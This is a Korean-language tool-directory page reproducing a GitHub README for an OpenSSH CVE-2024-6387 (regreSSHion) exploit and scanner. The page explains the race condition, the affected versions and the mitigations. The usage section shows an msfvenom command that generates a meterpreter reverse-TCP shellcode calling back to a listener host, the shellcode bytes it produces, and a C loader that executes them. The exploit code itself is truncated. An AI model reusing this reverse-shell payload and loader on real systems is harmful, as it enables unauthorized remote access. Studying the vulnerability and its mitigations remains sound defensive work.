Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-6387 — OpenSSH의 CVE-2024-6387 (regreSSHion)를 위한 익스플로잇 및 스캐너입니다. 공인된 침투 테스트 및 실습 환경을 위한 탐지, RCE 익스플로잇 및 셸코드 생성을 포함합니다. | Kitploit
도구/GitHubGitHub/kaleth4/cve-2024-6387
Vulnerability AnalysisExploitationShellcodePenetration TestingLearning & EducationPayload DevelopmentLabs & Practice
GitHubkaleth4/cve-2024-6387

CVE-2024-6387

OpenSSH의 CVE-2024-6387 (regreSSHion)를 위한 익스플로잇 및 스캐너입니다. 공인된 침투 테스트 및 실습 환경을 위한 탐지, RCE 익스플로잇 및 셸코드 생성을 포함합니다.

저장소 보기
76개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
      EXPLOIT CVE-2024-6387

💥 EXPLOIT CVE-2024-6387 (regreSSHion)

OpenSSH 서버의 CVE-2024-6387 취약점에 대한 분석, 탐지 및 통제된 테스트를 위한 도구입니다.


Bash Python Ethical


⚠️ 법적 및 윤리적 고지

이 저장소는 오로지 교육용입니다.
다음에서만 사용하십시오:

  • 실습 환경 (HTB, TryHackMe)
  • 자체 환경
  • 명시적 승인을 받은 감사

⚠️ 허가 없이 시스템을 스캔하거나 익스플로잇하는 것은 불법입니다.
이 콘텐츠는 방어 및 학습을 목적으로 합니다.


📑 목차

  • 📖 일반 설명
  • 🔍 기술 세부 사항
  • 📊 영향을 받는 버전
  • ⚙️ 사용법
  • 🛠️ 완화 및 수정
  • 📚 참고 자료
  • 👤 저자
  • 📢 면책 조항

📖 일반 설명

CVE-2024-6387은 regreSSHion으로 알려져 있으며, 2006년에 이전에 수정된 취약점(CVE-2006-5051)의 회귀입니다.

**OpenSSH 8.5p1 (2020)**에서 다시 도입되었으며, 다음을 허용합니다:

  • 원격 코드 실행 (RCE)
  • root로의 잠재적 접근
  • 인증되지 않은 공격
  • 사용자 상호작용 불필요

또한 관련 취약점이 존재합니다:

  • CVE-2024-6409 → 권한 분리 환경에서 자식 프로세스에 영향

🔍 기술 세부 사항

취약점은 sshd의 시그널 핸들러에 있는 경쟁 조건(race condition) 을 기반으로 합니다.

🧠 작동 방식

  1. 서버가 LoginGraceTime을 설정합니다 (기본값: 120초)
  2. 클라이언트가 인증에 실패하면:
    • SIGALRM 시그널이 발생합니다
  3. 핸들러가 시그널에 안전하지 않은 함수를 실행합니다:
    • syslog()
    • malloc()
    • free()

💣 영향

이로 인해 다음과 같은 문제가 발생할 수 있습니다:

  • 메모리 손상 (힙)
  • 임의 코드 실행

⏱️ 익스플로잇 난이도

  • 약 10,000회의 시도 필요 (경쟁 조건)
  • 32비트 시스템의 경우:
    • 6~8시간 소요 가능
  • 영향 요소:
    • ASLR
    • 네트워크 지연
    • 시스템 부하

📊 영향을 받는 버전

상태버전비고
⚠️ 취약< 4.4p1이전 패치가 없는 경우
✅ 안전4.4p1 → < 8.5p1이전에 수정됨
⚠️ 취약8.5p1 → < 9.8p1회귀 존재
✅ 수정됨>= 9.8p1공식 패치

🛡️ OpenBSD는 취약하지 않습니다. 2001년부터 추가 보호 조치가 구현되었습니다. 2 1


##⚙️ 사용법 python3 exploit.py

🔎 OpenSSH 서버 스캔

python3 scanner.py <IP> -p 22

```bash

# Generating a shellcode 
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.100 LPORT=9999 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of c file: 574 bytes

unsigned char buf[] =
"\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51"
"\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01"
"\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00"
"\x27\x0f\xc0\xa8\x38\x64\x51\x48\x89\xe6\x6a\x10\x5a\x6a"
"\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74"
"\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31"
"\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58"
"\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0"
"\x78\xed\xff\xe6";

사용자 정의 페이로드

#include <stdio.h>

// A placeholder of your custom payload 
const char shellcode[] =
"\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51"
"\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01"
"\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00"
"\x27\x0f\xc0\xa8\x38\x64\x51\x48\x89\xe6\x6a\x10\x5a\x6a"
"\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74"
"\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31"
"\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58"
"\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0"
"\x78\xed\xff\xe6";

int main() {
    // Execute shellcode
    printf("Executing shellcode...\n");
    void (*sc)() = (void(*)())shellcode;
    sc();

    return 0;
}

실제 페이로드

#include <stdio.h>
 

#define MAX_PACKET_SIZE (256 * 1024)
#define LOGIN_GRACE_TIME 120
#define MAX_STARTUPS 100
#define CHUNK_ALIGN(s) (((s) + 15) & ~15)


🛠️ 완화 및 수정 인터넷에 노출된 자산의 경우 특히 다음 단계를 긴급히 따르는 것이 좋습니다 :

  • 즉시 업데이트: OpenSSH 9.8p1로 업데이트하거나 각 배포판의 특정 패치를 적용하십시오 .
  • sshd 설정: 업데이트가 불가능한 경우 /etc/ssh/sshd_config 파일에서 LoginGraceTime 0을 설정하십시오 .
    • 경고: 이는 RCE를 방지하지만 연결 고갈로 인한 서비스 거부(DoS)에 서버를 노출시킵니다 .
  • 접근 제어: 네트워크 기반 제어(방화벽/VPN) 및 네트워크 세분화를 통해 SSH 접근을 제한하여 측면 이동을 방지하십시오 .

참고 자료

  • https://www.zscaler.com/blogs/security-research/openssh-vulnerabilities-cve-2024-6387-cve-2024-6409-pose-significant
  • https://www.exploit-db.com/exploits/52269
  • https://www.offsec.com/blog/regresshion-exploit-cve-2024-6387/
  • https://github.com/xaitax/CVE-2024-6387_Check

👤 저자

Kaleth Corcho
시스템 공학 · WolvesTI · 보고타, 콜롬비아

LinkedIn GitHub


📢 면책 조항

  • 중요 사항:
    • 이 도구는 승인된 침투 테스트 및 레드 팀 훈련 목적으로만 개발 및 사용됩니다. glibc 기반 Linux 시스템에서 OpenSSH 서버의 취약점을 식별하고 익스플로잇하도록 설계되었습니다. 이 도구의 무단 사용은 엄격히 금지되며, 이 도구의 소유자는 무단 접근 또는 악의적인 사용에 대해 책임을 지지 않습니다.
  • 법적 고지:
    • 해당 소유자의 명시적 승인 없이 시스템이나 네트워크에서 이 도구를 무단으로 사용하는 것은 관련 법률 및 규정을 위반할 수 있습니다. 사용자는 사이버 보안 테스트 및 평가를 규율하는 법적 및 윤리적 기준을 준수할 책임이 있습니다.
도구 다운로드